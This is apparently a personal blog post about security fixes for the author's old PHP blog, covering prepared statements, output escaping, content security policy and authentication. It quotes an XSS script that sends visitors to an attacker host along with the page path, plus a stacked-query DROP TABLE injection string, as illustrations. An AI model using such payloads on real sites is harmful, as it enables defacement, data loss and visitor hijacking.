Hacking my old blog: part 4, security fixes
To finish off the series, I discuss some of the mechanisms that could have been used to protect my old blog.
I've had fun writing this series and it seems fitting to finish by covering some of the fixes that could be put in place to resolve the issues found along the way. As I'm not planning to put the old code back into use, I'll be discussing these fixes hypothetically.
Upgrade old software
Right at the beginning of the series I highlighted how I wasn't able to run the old code on a modern version of PHP. As a result I had to find something old to work with but, as a general rule, that should never happen in a production environment. Having unsupported, outdated software in a production environment can leave you open to major issues. For example, if PHP 5.3 were found to have a significant flaw today that allowed direct access to the server, the numerous sites still running that unsupported version would be impacted and no fix would be forthcoming. The same is true of Windows XP, Vista and 7 - all now unsupported but still in use in some environments.
My first recommendation would be to upgrade the software, starting with the web application. To fix this blog would be a reasonably large undertaking as the database access method (the mysql_connect() function) and subsequent query functions would need replacing. It's unlikely this would be a simple case of find and replace!
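To give a feel for the scale of that change, here's a minimal sketch of what a like-for-like move to the mysqli extension might look like. The connection details and the posts table are made up for illustration, not taken from my actual code.

<?php
// Old style, removed in PHP 7:
// $link   = mysql_connect('localhost', 'bloguser', 'secret');
// mysql_select_db('blog', $link);
// $result = mysql_query('SELECT title FROM posts', $link);

// Rough mysqli equivalent - every call site needs a similar change.
$link = mysqli_connect('localhost', 'bloguser', 'secret', 'blog');
if (!$link) {
    die('Could not connect: ' . mysqli_connect_error());
}

$result = mysqli_query($link, 'SELECT title FROM posts');
while ($row = mysqli_fetch_assoc($result)) {
    echo $row['title'] . "\n";
}

mysqli_close($link);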
As you can imagine, going through the old code and rewriting it is going to take time, and the bigger the application the more time it would take. If you're a developer, I'd recommend spending time testing your application with newer versions of the software you depend on (PHP in my case, but it could equally be Windows itself) before the newer version is released to the public. By knowing what changes are coming, and ensuring your code works with them, you can hit the ground running when a new version comes out - potentially that puts you ahead of the competition. You may think that sounds obvious (it is), but it's amazing how many suppliers I've dealt with who don't support the latest (or even the previous) version of something.
That reminds me, I need to test eVitabu with PHP 8.0...
Sanitise input
I touched on this in part three. The sad yet key message is that you cannot trust user-provided input. As I wrote in my Masters' certificate (1st stage) project, in Microsoft's early years the company didn't expect users to attack the system [1], so didn't do much to protect against it - there was no sanitisation. Similarly, I wasn't expecting anyone to attack my blog ("little old me") so didn't really code in any protections.
Cross Site Scripting (XSS) can be protected against, at a very basic level, by using PHP's htmlentities() function. It should be noted that this isn't a complete protection, and shouldn't be relied upon, but it would have been a start. I would recommend not "rolling your own" sanitisation routine though. Find a code framework that offers to sanitise input and use that.
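As a quick illustration (using a made-up comment variable rather than my actual blog code), escaping output turns an injected script into harmless text:

<?php
// Hypothetical user-supplied comment containing an XSS attempt.
$comment = '<script>alert("XSS");</script>';

// htmlentities() converts the angle brackets and quotes into HTML entities,
// so the browser displays the text instead of executing it.
echo htmlentities($comment, ENT_QUOTES, 'UTF-8');
// Output: &lt;script&gt;alert(&quot;XSS&quot;);&lt;/script&gt;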
SQL injection can be protected against by using parameterised queries, also sometimes called prepared statements. PHP has a manual page on these, but essentially the query structure is defined up front and the parameter values are supplied at runtime. This sounds similar to what I was already doing, but the key difference is that all the quoting (placing ' around the data) is handled by the database driver, which keeps the data separate from the query itself. In theory, if only prepared statements are used it's not possible to suffer SQL injection.
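As a rough sketch, a parameterised query with PDO might look like this - the connection details and the posts table are placeholders, not my real configuration:

<?php
$pdo = new PDO('mysql:host=localhost;dbname=blog;charset=utf8mb4', 'bloguser', 'secret');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

// The query structure is fixed here; :id is a placeholder, not user data.
$statement = $pdo->prepare('SELECT title, body FROM posts WHERE id = :id');

// The user-supplied value is bound separately, so the driver never treats
// it as part of the SQL - there's no quoting for me to get wrong.
$statement->execute([':id' => $_GET['id'] ?? 0]);
$post = $statement->fetch(PDO::FETCH_ASSOC);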
I was lucky that SQL injection didn't trigger on my old blog, purely because multiple queries weren't supported:
mysql_query() sends a unique query (multiple queries are not supported) to the currently active database on the server that's associated with the specified link_identifier.
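To illustrate, a classic stacked-query attack appends a second, destructive statement to the first. The snippet below (with a made-up posts table) shows the sort of thing an attacker might try against my old code; because mysql_query() only ever runs one statement, the DROP TABLE is rejected rather than executed - but that's luck, not a defence, and other forms of injection could still be possible.

<?php
// Hypothetical malicious input attempting a stacked query.
$id = '1; DROP TABLE posts; --';

// The whole string ends up inside one call, but mysql_query() refuses to
// run more than one statement, so the second one never executes.
$result = mysql_query('SELECT title FROM posts WHERE id = ' . $id);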
Content Security Policy
As an additional protection, given that defence in depth [2] is always a good idea, it would be wise to apply a content security policy (CSP). Now, I'll point out that CSPs weren't around when my old code was in use; however, if that code had to go back into production, a CSP would help massively.
Scott Helme does a good job of explaining CSPs in his introductory blog post on the subject, so I won't attempt to reinvent the wheel. Scott really knows his stuff. In summary though, a CSP is a set of rules that tells the browser what content it's allowed to load and execute, be that scripts or images. You really should read Scott's post, as I've barely scratched the surface with that summary.
A CSP would have been useful because I could have said "only run scripts served from blog.jonsdocs.org.uk", and that would not allow embedded scripts like this one:
<script>window.location.href = "http://attacker.jonsdocs.org.uk/?source="+window.location.pathname;</script>
For that embedded script to run, the CSP would have to allow unsafe-inline scripts. A CSP could have been used to avoid the embedded image too.
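As a rough sketch (the exact policy would need tailoring to the site and testing carefully), the blog could send a header along these lines before any other output:

<?php
// A hypothetical, deliberately strict starting policy: scripts and images
// may only come from the blog's own origin, and plugins are blocked.
// Inline scripts stay blocked because 'unsafe-inline' is never allowed.
header("Content-Security-Policy: default-src 'self'; "
     . "script-src 'self' https://blog.jonsdocs.org.uk; "
     . "img-src 'self'; object-src 'none'");

The same policy could equally be set in the Apache configuration rather than in the PHP code.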
Implement application level authentication
I gained access directly to the admin back end as soon as I knew its address because the authentication was all handled by the web server. My restored blog didn't have the web server configuration to lock down access, so we were straight in. Rather than relying on another system (the web server, Apache 2, in this case), if the application itself had been responsible for authenticating users then the restored application would have kept us locked out.
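As a very rough sketch, an application-level check at the top of every admin page might look like the snippet below. The session flag and login path are invented for illustration, and a real implementation would also need secure password storage and careful session handling.

<?php
// Hypothetical guard included at the top of each admin page.
session_start();

if (empty($_SESSION['authenticated_user'])) {
    // Not logged in at the application level: send the visitor to a login
    // form instead of trusting the web server to have blocked access.
    header('Location: /admin/login.php');
    exit;
}

The login form behind that redirect could then check credentials using PHP's built-in password_hash() and password_verify() functions rather than anything home-grown.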
While I'm talking about authentication, it would be remiss of me not to mention multi-factor authentication. By requiring a token code, or security key, to log in to the back end it would also have been possible to protect against stolen credentials being reused.
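For the token code route, the maths behind a time-based one-time password (TOTP, RFC 6238) is simple enough to sketch, although in practice I'd reach for a well-tested library. The example below assumes a raw binary shared secret for simplicity; real authenticator apps exchange it base32-encoded.

<?php
// In reality this would be the per-user secret stored at enrolment.
$sharedSecret = random_bytes(20);

function totpCode(string $secret, int $timestamp): string
{
    $counter = pack('N*', 0, intdiv($timestamp, 30)); // 64-bit big-endian 30-second step count
    $hash    = hash_hmac('sha1', $counter, $secret, true);
    $offset  = ord($hash[19]) & 0x0f;                 // dynamic truncation (RFC 4226)
    $value   = ((ord($hash[$offset]) & 0x7f) << 24)
             | (ord($hash[$offset + 1]) << 16)
             | (ord($hash[$offset + 2]) << 8)
             | ord($hash[$offset + 3]);

    return str_pad((string)($value % 1000000), 6, '0', STR_PAD_LEFT);
}

// Compare the submitted code in constant time.
$valid = hash_equals(totpCode($sharedSecret, time()), $_POST['token'] ?? '');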
Conclusions
It's been a fun exercise looking at my old code and seeing how I could attack, then defend, it. I'm pleased to say that since I wrote that code I've learnt a lot and don't make the same mistakes. Nonetheless, I know I'll sometimes write insecure code (not intentionally), so it's always good to reflect on my work and review it with a colleague.
Banner image: "Cartoon Comic Fort Fortress Stronghold Castle" by qubodup on OpenClipart.org
[1] The book I found that out in is Beautiful Security, which is a collection of security essays. Really interesting read. For those of you familiar with Harvard referencing:
Zatko, P.M. (2009). Psychological Security Traps. In: Oram, A. and Viega, J. (eds.) Beautiful Security. United States of America: O'Reilly Media.
[2] Defence in depth is the practice of having multiple layers of defence, rather than relying on a single mechanism. The idea is that different layers complement each other, and have different weaknesses. An attacker would need to compromise each layer in order for their attack to be successful.